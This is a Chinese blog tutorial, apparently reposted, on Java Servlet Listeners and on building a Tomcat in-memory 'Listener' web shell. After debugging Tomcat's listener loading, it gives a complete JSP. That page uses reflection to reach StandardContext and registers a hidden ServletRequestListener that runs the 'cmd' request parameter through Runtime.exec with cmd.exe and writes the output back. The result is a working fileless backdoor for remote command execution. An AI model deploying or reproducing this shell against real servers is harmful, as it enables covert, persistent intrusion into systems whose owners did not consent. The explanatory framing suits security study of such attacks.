概述
Listener是Java Web App中的一种事故监听机制,用于监听Web应用程序中产生的事故,比方,在ServletContext初始化完成后,会触发contextInitialized事故,实现了ServletContextListener接口的Listener就可以接收到事故通知,可以在内部做一些初始化工作,如加载设置文件,初始化数据库连接池等。
简单来说Listener(监听器)就是一个实现特定接口的平凡java程序,这个程序专门用于监听另一个java对象的方法调用或属性改变,当被监听对象发生上述事故后,监听器某个方法将立即被实行。Listener常用于GUI应用程序中,我们的内存马重要涉及到的是ServletRequestListener(由于其在每次请求中都会触发)
增补
在Java WEB中,三组件的实行顺序是Listener -> Filter -> Servlet。学习的时候不知道,先学的Servlet内存马,导致对三组件理解不是很深,后边会优化Servlet内存马的博客,大家包涵。
Listener示例
创建以下类,继承ServletRequestListener,然后实现两个方法requestDestroyed以及requestInitialized,- @WebListener
- // 这里可以直接使用WebListener,也可以在web.xml进行配置
- public class ListenerShell implements ServletRequestListener {
- public void requestDestroyed(ServletRequestEvent sre) {
- System.out.println("requestDestroyed......");
- }
- public void requestInitialized(ServletRequestEvent sre) {
- System.out.println("requestInitialized......");
- }
- }
- <listener>
- <listener-class>org.example.memoryshell.ListenerShell</listener-class>
- </listener>
在ListenerShell的class处还有requestDestroyed、requestInitialized处打断点,随后启动项目
可以看到class处断点被掷中,然后跟踪左下角的堆栈信息,可以看到前边是调用了StandardContext.listenerStart()方法过来的,然后我们看一下这个方法是干嘛的。
这块的代码看起来是调用了findApplicationListeners把全部的listeners查出来,然后创建对应的listener实例。
其实applicationListeners的界说居然是一个List,嗯?web.xml中设置的不就是一个类的全路径字符串嘛,打开调试窗口看一下applicationListeners是啥东西
确实,这里就是一个List里边存储的就是全部的Listener,啊 这......
继续往下跟代码,此时拿到的results数组就是Listener的实例对象了,继续往下跟
这一段的逻辑就是,判定这个Listener的实例是否是ServletContextAttributeListener、ServletRequestAttributeListener、ServletRequestListener、HttpSessionIdListener、HttpSessionAttributeListener中的其中一种,如果是的话就把Listener实例添加到eventListeners中。
以上的逻辑都是设置在web.xml或者是利用了注解的设置下产生的,但是我们该怎么把非这种途径下产生的Listener放进入呢?
注意,最后还有一行语句是eventListeners.addAll,放进去的东西是this.getApplicationEventListeners(),我们看一下对应的方法
其实就是一个List,然后恰好在StandardContext中还有往这个List中写入的方法,我们看一下
所以有了这些内容,我们就可以构造基于Listener的恶意代码了。
增补1
通过debug我们还可以发现每一次请求都会触发ServletRequestListener.requestInitialized方法,也就是请求过来的时候Listener对实行初始化创建方法requestInitialized,然后详细的监听器逻辑则实行requestDestroyed方法。
Listener内存马分析
通过上述debug可以得出,Tomcat中的Listener来源于两部分:一是从web.xml设置文件中实例化的Listener,这部分我们无法控制;二是applicationEventListenersList中的Listener,后者是我们可以控制的。只需向applicationEventListenersList中添加恶意Listener,即可实现目标。
现实上,StandardContext类中提供了addApplicationEventListener()方法,我们可以直接调用该方法,将恶意Listener添加到applicationEventListenersList中。
因此,实现内存马的步骤如下:
- 编写并继承一个恶意Listener;
- 获取StandardContext实例;
- 调用StandardContext.addApplicationEventListener()方法,将恶意Listener添加到监听列表中。
Listener内存马代码
创建一个listener_shell.jsp,写入以下内容- <%@ page contentType="text/html;charset=UTF-8" language="java" %>
- <%@ page import="org.apache.catalina.core.StandardContext" %>
- <%@ page import="java.lang.reflect.Field" %>
- <%@ page import="org.apache.catalina.connector.Request" %>
- <%@ page import="java.io.InputStream" %>
- <%@ page import="java.util.Scanner" %>
- <%!
- // 定义一个简单的 Servlet 用于执行系统命令
- public class MemShellListener implements ServletRequestListener{
- public void requestDestroyed(ServletRequestEvent sre) {
- HttpServletRequest req = (HttpServletRequest) sre.getServletRequest();
- String cmd = req.getParameter("cmd");
- if(cmd == null) return;
- try {
- InputStream in = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",req.getParameter("cmd")}).getInputStream();
- Scanner s = new Scanner(in).useDelimiter("\\a");
- String out = s.hasNext()?s.next():"";
- Field requestF = req.getClass().getDeclaredField("request");
- requestF.setAccessible(true);
- Request request = (Request)requestF.get(req);
- request.getResponse().getWriter().write(out);
- }catch (Exception ignore){ }
- }
- }
- %>
- <%
- // 使用反射获取 StandardContext 上下文
- Field reqField = request.getClass().getDeclaredField("request");
- reqField.setAccessible(true);
- Request req = (Request) reqField.get(request);
- StandardContext stdContext = (StandardContext) req.getContext();
- stdContext.addApplicationEventListener(new MemShellListener());
- %>
- <html>
- <head>
- <title>Title</title>
- </head>
- <body>
- <h1>Hello Listener</h1>
- </body>
- </html>
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
